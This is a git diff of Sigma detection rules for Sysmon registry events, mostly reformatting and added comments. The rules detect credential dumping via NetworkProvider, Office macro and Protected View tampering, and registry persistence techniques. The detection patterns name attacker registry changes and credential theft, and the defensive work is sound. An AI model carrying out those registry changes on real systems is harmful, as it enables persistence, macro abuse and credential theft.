b/sigma/sysmon/registry/registry_set/registry_set_new_network_provider.yml @@ -1,11 +1,10 @@ title: Potential Credential Dumping Attempt Using New NetworkProvider - REG id: 0442defa-b4a2-41c9-ae2c-ea7042fc4701 related: - - id: baef1ec6-2ca9-47a3-97cc-4cf2bda10b77 - type: similar + - id: baef1ec6-2ca9-47a3-97cc-4cf2bda10b77 + type: similar status: experimental -description: Detects when an attacker tries to add a new network provider in order - to dump clear text credentials, similar to how the NPPSpy tool does it +description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it references: - https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy @@ -32,6 +31,7 @@ detection: - \System\CurrentControlSet\Services\WebClient\NetworkProvider - \System\CurrentControlSet\Services\LanmanWorkstation\NetworkProvider - \System\CurrentControlSet\Services\RDPNP\NetworkProvider + # - '\System\CurrentControlSet\Services\P9NP\NetworkProvider' # Related to WSL remove the comment if you use WSL in your ENV filter_valid_procs: Image: C:\Windows\System32\poqexec.exe condition: registry_set and (selection and not 1 of filter*) diff --git a/sigma/sysmon/registry/registry_set/registry_set_odbc_driver_registered.yml b/sigma/sysmon/registry/registry_set/registry_set_odbc_driver_registered.yml index df4395201..fdfa231d6 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_odbc_driver_registered.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_odbc_driver_registered.yml @@ -31,8 +31,7 @@ detection: TargetObject|contains: \Microsoft Excel Driver Details|startswith: C:\Progra Details|endswith: \ACEODBC.DLL - condition: registry_set and (selection and not 1 of filter_main_* and not 1 of - filter_optional_*) + condition: registry_set and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Likely level: low diff --git a/sigma/sysmon/registry/registry_set/registry_set_odbc_driver_registered_susp.yml b/sigma/sysmon/registry/registry_set/registry_set_odbc_driver_registered_susp.yml index 570054966..304bd8959 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_odbc_driver_registered_susp.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_odbc_driver_registered_susp.yml @@ -1,8 +1,7 @@ title: Potentially Suspicious ODBC Driver Registered id: e4d22291-f3d5-4b78-9a0c-a1fbaf32a6a4 status: experimental -description: Detects the registration of a new ODBC driver where the driver is located - in a potentially suspicious location +description: Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location references: - https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/registry/registry_set/registry_set_office_access_vbom_tamper.yml b/sigma/sysmon/registry/registry_set/registry_set_office_access_vbom_tamper.yml index d78e38de6..56bc2cbf8 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_office_access_vbom_tamper.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_office_access_vbom_tamper.yml @@ -1,12 +1,10 @@ title: Trust Access Disable For VBApplications id: 1a5c46e9-f32f-42f7-b2bc-6e9084db7fbf related: - - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd - type: obsoletes + - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd + type: obsoletes status: test -description: Detects registry changes to Microsoft Office "AccessVBOM" to a value - of "1" which disables trust access for VBA on the victim machine and lets attackers - execute malicious macros without any Microsoft Office warnings. +description: Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings. references: - https://twitter.com/inversecos/status/1494174785621819397 - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/ diff --git a/sigma/sysmon/registry/registry_set/registry_set_office_disable_protected_view_features.yml b/sigma/sysmon/registry/registry_set/registry_set_office_disable_protected_view_features.yml index fa69c94ec..1ba046e9f 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_office_disable_protected_view_features.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_office_disable_protected_view_features.yml @@ -1,11 +1,10 @@ title: Microsoft Office Protected View Disabled id: a5c7a43f-6009-4a8c-80c5-32abf1c53ecc related: - - id: 7c637634-c95d-4bbf-b26c-a82510874b34 - type: obsoletes + - id: 7c637634-c95d-4bbf-b26c-a82510874b34 + type: obsoletes status: test -description: Detects changes to Microsoft Office protected view registry keys with - which the attacker disables this feature. +description: Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ @@ -32,10 +31,10 @@ detection: selection_values_1: Details: DWORD (0x00000001) TargetObject|endswith: - - \DisableAttachementsInPV - - \DisableInternetFilesInPV - - \DisableIntranetCheck - - \DisableUnsafeLocationsInPV + - \DisableAttachementsInPV # Turn off Protected View for attachments opened from Outlook + - \DisableInternetFilesInPV # Turn off Protected View for files downloaded from Internet zone + - \DisableIntranetCheck # Turn off Protected View for file located in UNC paths + - \DisableUnsafeLocationsInPV # Turn off Protected View for unsafe locations selection_values_0: Details: DWORD (0x00000000) TargetObject|endswith: diff --git a/sigma/sysmon/registry/registry_set/registry_set_office_enable_dde.yml b/sigma/sysmon/registry/registry_set/registry_set_office_enable_dde.yml index 83e2206b5..57a8772c9 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_office_enable_dde.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_office_enable_dde.yml @@ -1,8 +1,7 @@ title: Enable Microsoft Dynamic Data Exchange id: 63647769-326d-4dde-a419-b925cc0caf42 status: test -description: Enable Dynamic Data Exchange protocol (DDE) in all supported editions - of Microsoft Word or Excel. +description: Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel. references: - https://msrc.microsoft.com/update-guide/vulnerability/ADV170021 author: frack113 diff --git a/sigma/sysmon/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml b/sigma/sysmon/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml index 9d392a6b0..a9aef0c79 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting id: 396ae3eb-4174-4b9b-880e-dc0364d78a19 status: experimental -description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" - which if enabled allows the automatic loading of any configured VBA project/module +description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module references: - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53 - https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/ diff --git a/sigma/sysmon/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml b/sigma/sysmon/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml index cc1e279a0..b7aac31e3 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml @@ -1,8 +1,7 @@ title: Outlook Macro Execution Without Warning Setting Enabled id: e3b50fa5-3c3f-444e-937b-0a99d33731cd status: test -description: Detects the modification of Outlook security setting to allow unprompted - execution of macros. +description: Detects the modification of Outlook security setting to allow unprompted execution of macros. references: - https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53 @@ -25,7 +24,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: TargetObject|endswith: \Outlook\Security\Level - Details|contains: '0x00000001' + Details|contains: '0x00000001' # Enable all Macros condition: registry_set and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml b/sigma/sysmon/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml index 79a52cb64..2e9fc3a8e 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml @@ -1,13 +1,12 @@ title: Outlook EnableUnsafeClientMailRules Setting Enabled - Registry id: 6763c6c8-bd01-4687-bc8d-4fa52cf8ba08 related: - - id: c3cefdf4-6703-4e1c-bad8-bf422fc5015a - type: similar - - id: 55f0a3a1-846e-40eb-8273-677371b8d912 - type: similar + - id: c3cefdf4-6703-4e1c-bad8-bf422fc5015a + type: similar + - id: 55f0a3a1-846e-40eb-8273-677371b8d912 # ProcCreation variation + type: similar status: experimental -description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" - which allows outlook to run applications or execute macros +description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros references: - https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048 - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44 diff --git a/sigma/sysmon/registry/registry_set/registry_set_office_outlook_security_settings.yml b/sigma/sysmon/registry/registry_set/registry_set_office_outlook_security_settings.yml index 99f140d8d..579fc6c90 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_office_outlook_security_settings.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_office_outlook_security_settings.yml @@ -1,8 +1,8 @@ title: Outlook Security Settings Updated - Registry id: c3cefdf4-6703-4e1c-bad8-bf422fc5015a related: - - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd - type: similar + - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd # EnableUnsafeClientMailRules + type: similar status: test description: Detects changes to the registry values related to outlook security settings references: diff --git a/sigma/sysmon/registry/registry_set/registry_set_office_trust_record_susp_location.yml b/sigma/sysmon/registry/registry_set/registry_set_office_trust_record_susp_location.yml index c7e400502..9784ef97a 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_office_trust_record_susp_location.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_office_trust_record_susp_location.yml @@ -1,11 +1,10 @@ title: Macro Enabled In A Potentially Suspicious Document id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd related: - - id: 295a59c1-7b79-4b47-a930-df12c15fc9c2 - type: derived + - id: 295a59c1-7b79-4b47-a930-df12c15fc9c2 + type: derived status: experimental -description: Detects registry changes to Office trust records where the path is located - in a potentially suspicious location +description: Detects registry changes to Office trust records where the path is located in a potentially suspicious location references: - https://twitter.com/inversecos/status/1494174785621819397 - Internal Research @@ -27,6 +26,7 @@ detection: TargetObject|contains: \Security\Trusted Documents\TrustRecords selection_paths: TargetObject|contains: + # Note: add more locations where you don't expect a user to executed macro enabled docs - /AppData/Local/Microsoft/Windows/INetCache/ - /AppData/Local/Temp/ - /PerfLogs/ diff --git a/sigma/sysmon/registry/registry_set/registry_set_office_trusted_location_uncommon.yml b/sigma/sysmon/registry/registry_set/registry_set_office_trusted_location_uncommon.yml index 304d3455e..41d421e3e 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_office_trusted_location_uncommon.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_office_trusted_location_uncommon.yml @@ -1,12 +1,10 @@ title: Uncommon Microsoft Office Trusted Location Added id: f742bde7-9528-42e5-bd82-84f51a8387d2 related: - - id: a0bed973-45fa-4625-adb5-6ecdf9be70ac - type: derived + - id: a0bed973-45fa-4625-adb5-6ecdf9be70ac + type: derived status: experimental -description: Detects changes to registry keys related to "Trusted Location" of Microsoft - Office where the path is set to something uncommon. Attackers might add additional - trusted locations to avoid macro security restrictions. +description: Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions. references: - Internal Research - https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01 @@ -44,10 +42,8 @@ detection: Image|contains: - :\Program Files\Microsoft Office\ - :\Program Files (x86)\Microsoft Office\ - condition: registry_set and (selection and not 1 of filter_main_* and not 1 of - filter_exclude_*) + condition: registry_set and (selection and not 1 of filter_main_* and not 1 of filter_exclude_*) falsepositives: - - Other unknown legitimate or custom paths need to be filtered to avoid false - positives + - Other unknown legitimate or custom paths need to be filtered to avoid false positives level: high ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_office_vba_warnings_tamper.yml b/sigma/sysmon/registry/registry_set/registry_set_office_vba_warnings_tamper.yml index ff2f26c42..8829dc6d3 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_office_vba_warnings_tamper.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_office_vba_warnings_tamper.yml @@ -1,11 +1,10 @@ title: Office Macros Auto-Enabled id: 91239011-fe3c-4b54-9f24-15c86bb65913 related: - - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd - type: obsoletes + - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd + type: obsoletes status: test -description: Detects registry changes to Microsoft Office "VBAWarning" to a value - of "1" which enables the execution of all macros, whether signed or unsigned. +description: Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned. references: - https://twitter.com/inversecos/status/1494174785621819397 - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/ diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml index cad937f93..df65f4081 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml @@ -1,15 +1,10 @@ title: Potential Persistence Via AppCompat RegisterAppRestart Layer id: b86852fb-4c77-48f9-8519-eb1b2c308b59 status: experimental -description: 'Detects the setting of the REGISTERAPPRESTART compatibility layer on - an application. - - This compatibility layer allows an application to register for restart using the - "RegisterApplicationRestart" API. - +description: | + Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. + This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. This can be potentially abused as a persistence mechanism. - - ' references: - https://github.com/nasbench/Misc-Research/blob/d114d6a5e0a437d3818e492ef9864367152543e7/Other/Persistence-Via-RegisterAppRestart-Shim.md author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_app_paths.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_app_paths.yml index 3a2971fdf..02140e4f8 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_app_paths.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_app_paths.yml @@ -1,18 +1,11 @@ title: Potential Persistence Via App Paths Default Property id: 707e097c-e20f-4f67-8807-1f72ff4500d6 status: experimental -description: 'Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App - Paths\ registry. Which might be used as a method of persistence - +description: | + Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence The entries found under App Paths are used primarily for the following purposes. - - First, to map an application''s executable file name to that file''s fully qualified - path. - - Second, to prepend information to the PATH environment variable on a per-application, - per-process basis. - - ' + First, to map an application's executable file name to that file's fully qualified path. + Second, to prepend information to the PATH environment variable on a per-application, per-process basis. references: - https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/ - https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN @@ -36,6 +29,7 @@ detection: - (Default) - Path Details|contains: + # Add more suspicious paths or binaries as you see fit. - \Users\Public - \AppData\Local\Temp\ - \Windows\Temp\ @@ -56,7 +50,6 @@ detection: - .ps1 condition: registry_set and selection falsepositives: - - Legitimate applications registering their binary from on of the suspicious locations - mentioned above (tune it) + - Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it) level: high ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_autodial_dll.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_autodial_dll.yml index 8c44ce85b..93158a510 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_autodial_dll.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_autodial_dll.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via AutodialDLL id: e6fe26ee-d063-4f5b-b007-39e90aaf50e3 status: experimental -description: Detects change the the "AutodialDLL" key which could be used as a persistence - method to load custom DLL via the "ws2_32" library +description: Detects change the the "AutodialDLL" key which could be used as a persistence method to load custom DLL via the "ws2_32" library references: - https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/ - https://persistence-info.github.io/Data/autodialdll.html diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_chm.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_chm.yml index fc3fa3905..b12c4258d 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_chm.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_chm.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via CHM Helper DLL id: 976dd1f2-a484-45ec-aa1d-0e87e882262b status: experimental -description: Detects when an attacker modifies the registry key "HtmlHelp Author" - to achieve persistence +description: Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence references: - https://persistence-info.github.io/Data/htmlhelpauthor.html - https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/ diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml index 0929dc38a..9f64c6d02 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml @@ -1,11 +1,9 @@ title: Potential Persistence Via COM Hijacking From Suspicious Locations id: 3d968d17-ffa4-4bc0-bfdc-f139de76ce77 status: experimental -description: Detects potential COM object hijacking where the "Server" (In/Out) is - pointing to a suspicious or unsuale location +description: Detects potential COM object hijacking where the "Server" (In/Out) is pointing to a suspicious or unsuale location references: - - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ - (idea) + - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea) author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/28 modified: 2023/09/28 @@ -25,12 +23,12 @@ detection: TargetObject|endswith: - \InprocServer32\(Default) - \LocalServer32\(Default) - Details|contains: + Details|contains: # Add more suspicious paths and locations - \AppData\Local\Temp\ - \Desktop\ - \Downloads\ - \Microsoft\Windows\Start Menu\Programs\Startup\ - - \System32\spool\drivers\color\ + - \System32\spool\drivers\color\ # as seen in the knotweed blog - \Users\Public\ - \Windows\Temp\ - '%appdata%' @@ -38,7 +36,6 @@ detection: - '%tmp%' condition: registry_set and selection falsepositives: - - Probable legitimate applications. If you find these please add them to an exclusion - list + - Probable legitimate applications. If you find these please add them to an exclusion list level: high ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml index 99e4c515e..2e2ac15d8 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml @@ -1,8 +1,7 @@ title: Potential PSFactoryBuffer COM Hijacking id: 243380fa-11eb-4141-af92-e14925e77c1b status: experimental -description: Detects changes to the PSFactory COM InProcServer32 registry. This technique - was used by RomCom to create persistence storing a malicious DLL. +description: Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL. references: - https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine - https://strontic.github.io/xcyclopedia/library/clsid_C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6.html diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml index bf5abfb27..a385ce49f 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml @@ -1,10 +1,7 @@ title: Potential Persistence Via Custom Protocol Handler id: fdbf0b9d-0182-4c43-893b-a1eaab92d085 status: experimental -description: Detects potential persistence activity via the registering of a new custom - protocole handlers. While legitimate applications register protocole handlers - often times during installation. And attacker can abuse this by setting a custom - handler to be used as a persistence mechanism. +description: Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism. references: - https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/ author: Nasreddine Bencherchali (Nextron Systems) @@ -25,16 +22,18 @@ detection: TargetObject|startswith: HKCR\ Details|startswith: 'URL:' filter_main_ms_trusted: - Details|startswith: URL:ms- + Details|startswith: URL:ms- # Microsoft Protocols usually start with "ms-" filter_main_generic_locations: - Image|startswith: + Image|startswith: # Add more folders to avoid FP - C:\Program Files (x86) - C:\Program Files\ - C:\Windows\System32\ - C:\Windows\SysWOW64\ + # Uncomment This section to add specific Protocol Handler names that are know + # filter_specific: + # Details: 'URL:' condition: registry_set and (selection and not 1 of filter_main_*) falsepositives: - - Many legitimate applications can register a new custom protocol handler. Additional - filters needs to applied according to your environment. + - Many legitimate applications can register a new custom protocol handler. Additional filters needs to applied according to your environment. level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml index 83e31723b..98f265a1b 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Event Viewer Events.asp id: a1e11042-a74a-46e6-b07c-c4ce8ecc239b status: test -description: Detects potential registry persistence technique using the Event Viewer - "Events.asp" technique +description: Detects potential registry persistence technique using the Event Viewer "Events.asp" technique references: - https://twitter.com/nas_bench/status/1626648985824788480 - https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.InternetCommunicationManagement::EventViewer_DisableLinks @@ -24,15 +23,17 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection: + # Covers both "\Policies\" and "\Software\" paths for both "Machine" and "User" level configs + # Also "MicrosoftRedirectionProgramCommandLineParameters" key TargetObject|contains: - \Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionProgram - \Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionURL filter_default_redirect_program: - Image|endswith: C:\WINDOWS\system32\svchost.exe + Image|endswith: C:\WINDOWS\system32\svchost.exe # Set via GPO TargetObject|endswith: \Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionProgram Details: '%%SystemRoot%%\PCHealth\HelpCtr\Binaries\HelpCtr.exe' filter_default_redirect_program_cli: - Image|endswith: C:\WINDOWS\system32\svchost.exe + Image|endswith: C:\WINDOWS\system32\svchost.exe # Set via GPO TargetObject|endswith: \Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionProgramCommandLineParameters Details: -url hcp://services/centers/support?topic=%%s filter_url: diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_globalflags.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_globalflags.yml index 21a2bd8c6..5bc4537b2 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_globalflags.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_globalflags.yml @@ -1,11 +1,10 @@ title: Potential Persistence Via GlobalFlags id: 36803969-5421-41ec-b92f-8500f79c23b0 related: - - id: c81fe886-cac0-4913-a511-2822d72ff505 - type: obsoletes + - id: c81fe886-cac0-4913-a511-2822d72ff505 + type: obsoletes status: test -description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit - keys +description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys references: - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_ie.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_ie.yml index d215a50fc..f1a1c8d30 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_ie.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_ie.yml @@ -1,10 +1,7 @@ title: Modification of IE Registry Settings id: d88d0ab2-e696-4d40-a2ed-9790064e66b3 status: experimental -description: Detects modification of the registry settings used for Internet Explorer - and other Windows components that use these settings. An attacker can abuse this - registry key to add a domain to the trusted sites Zone or insert javascript for - persistence +description: Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry @@ -23,8 +20,7 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection_domains: - TargetObject|contains: \Software\Microsoft\Windows\CurrentVersion\Internet - Settings + TargetObject|contains: \Software\Microsoft\Windows\CurrentVersion\Internet Settings filter_dword: Details|startswith: DWORD filter_office: @@ -40,6 +36,7 @@ detection: filter_binary: Details: Binary Data filter_accepted_documents: + # Spotted during office installations TargetObject|contains: \Accepted Documents\ condition: registry_set and (selection_domains and not 1 of filter_*) falsepositives: diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_ifilter.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_ifilter.yml index c7469fc49..780643e8d 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_ifilter.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_ifilter.yml @@ -1,11 +1,7 @@ title: Register New IFiltre For Persistence id: b23818c7-e575-4d13-8012-332075ec0a2b status: experimental -description: Detects when an attacker register a new IFilter for an extension. Microsoft - Windows Search uses filters to extract the content of items for inclusion in a - full-text index. You can extend Windows Search to index new or proprietary file - types by writing filters to extract the content, and property handlers to extract - the properties of files +description: Detects when an attacker register a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files references: - https://persistence-info.github.io/Data/ifilters.html - https://twitter.com/0gtweet/status/1468548924600459267 @@ -36,36 +32,40 @@ detection: TargetObject|contains: \PersistentAddinsRegistered\{89BCB740-6119-101A-BCB7-00DD010655AF} filter_default_targets: TargetObject|contains: - - \CLSID\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}\ - - \CLSID\{4887767F-7ADC-4983-B576-88FB643D6F79}\ - - \CLSID\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}\ - - \CLSID\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}\ - - \CLSID\{098f2470-bae0-11cd-b579-08002b30bfeb}\ - - \CLSID\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}\ - - \CLSID\{2e2294a9-50d7-4fe7-a09f-e6492e185884}\ - - \CLSID\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}\ - - \CLSID\{3B224B11-9363-407e-850F-C9E1FFACD8FB}\ - - \CLSID\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}\ - - \CLSID\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}\ - - \CLSID\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}\ - - \CLSID\{58A9EBF6-5755-4554-A67E-A2467AD1447B}\ - - \CLSID\{5e941d80-bf96-11cd-b579-08002b30bfeb}\ - - \CLSID\{698A4FFC-63A3-4E70-8F00-376AD29363FB}\ - - \CLSID\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}\ - - \CLSID\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}\ - - \CLSID\{9694E38A-E081-46ac-99A0-8743C909ACB6}\ - - \CLSID\{98de59a0-d175-11cd-a7bd-00006b827d94}\ - - \CLSID\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}\ - - \CLSID\{B4132098-7A03-423D-9463-163CB07C151F}\ - - \CLSID\{d044309b-5da6-4633-b085-4ed02522e5a5}\ - - \CLSID\{D169C14A-5148-4322-92C8-754FC9D018D8}\ - - 